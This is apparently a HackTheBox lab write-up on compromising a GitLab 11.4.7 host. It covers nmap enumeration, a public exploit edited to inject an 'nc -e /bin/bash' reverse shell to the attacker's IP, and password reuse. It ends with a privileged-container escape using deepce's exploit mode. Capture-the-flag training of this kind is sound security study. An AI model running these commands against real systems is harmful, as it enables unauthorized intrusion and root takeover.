![83ba1160aed40b9e82489fb164a0941a.png](5ac295132433425db83e686264c6779a.png) ### Port Scanning and General Enumeration (Nmap) `nmap -sV -sC -oN nmap/initial -T4` ![01766e66f07b0532c6eafa237ac4f942.png](9639a4557dff4f29b40a47a859d98dc6.png) 22 and ..5080? ![24bf77ebc310c17fafc4155a938cb2db.png](47be9c791e674ceba17667fd2b732371.png) **Gitlab!** --- ### Access (searchsploit, gitlab) Let's see what version of **Gitlab** we're working with 1. `top right, drop down menu` 2. `help` ![b13dab13c8034866bf0bb34683274d86.png](b33aa49d82b44f4cb87802ba176f4343.png) Gitlab version **11.4.7** Checking **searchsploit** for public exploits for **Gitlab 11.4.7** ![f5dffc1577a8836b259fa7323b824e4a.png](12b8d606802146f8a628e183d6ece5fd.png) I used the first one but it requires a bit of editing. Here's what I added: ```python open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"] ``` The original wouldn't work, this one should. (replace *YOURIP* and *YOURPORT* with your listening ip and port, respectively) Start a listener `nc -lvnp 4444` And run the script! `python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g -l YOURIP -p YOUR PORT` ![4abde2a4dc33c1d5565376d1d8fce23b.png](44f85e16d48b45f788bc17eafee05d22.png) ![a4d0888417d0169ff9a002813cc900cd.png](d8bb5c9fcf4448849a43b63d2a4b8b66.png) > **Quick tip!** > > You may want to stabilize your shell at this point. A quick and dirty way to do so is > > ``` > > python3 -c 'import pty; pty.spawn("/bin/bash")' > > export TERM=xterm > >``` --- ### Privesc Part 1 (password-reuse, linpeas) **Linpeas** kicks back a *lot* of juicy informtion, but this box has some curveballs and 90% of it is irrelevant for the completion of this box. This is definitely a case of **K.I.S.S.** > **K.I.S.S.** > > *keep it simple stupid* Main two things we're after here: ![d9ce8df9f740548c9246af17a2c3026d.png](765d36c223a34f75ac273cd8351556ea.png) ![fccc2c3c7c79fc065a7bfa93b8d3aae6.png](505d908d0cc44c7c94b6a3cfeb0eb73d.png) *keep that in mind for later* First thing you should *always* do when you find a plaintext password? Use it! Use it everywhere! Turns out.. ![b6c79cbcac5221a07c57150b84d12491.png](2d902d3c6ae9472485fbd7b549cc786f.png) Let's capture the root fla--- ![9426a1f8f5cc67202869a88d2213e5ea.png](954c67f9f8d242788a64f4c7e1c4404e.png) Well, let's try and escape the docker then! --- ### Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape) First things first when trying to do anything: **Enumeration**. We'll be using **deepce**. It's very similar to **Linpeas**. It's *amazing*. The interesting finding: ![f8149f7bcc56c9c6039362eef57007d0.png](1987a99903c34ce9bd012e73438d31bc.png) Running a container as **privileged** gives us the ability to execute commands as root. The other cool feature of **deepce** is it has an **exploit** mode `./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce` *you can read about the available exploits by following the link above in **Reading/Resources*** All that's left to do is **ssh** in as the new root user! ![154c1dc595d2bc4301525500c4c6cbfe.png](cdf082bdb53f4c63b32984dffb5eb685.png) ![9cb7b52fb2f22b63008b10aa39f7584c.png](b1236b1f10654db1b99ae9fb3b92572d.png) --- Back to [[HackTheBox Index]] Tags: #htb #hackthebox #gitlab #searchsploit #linpeas #deepce #docker_escape #box_writeups Related: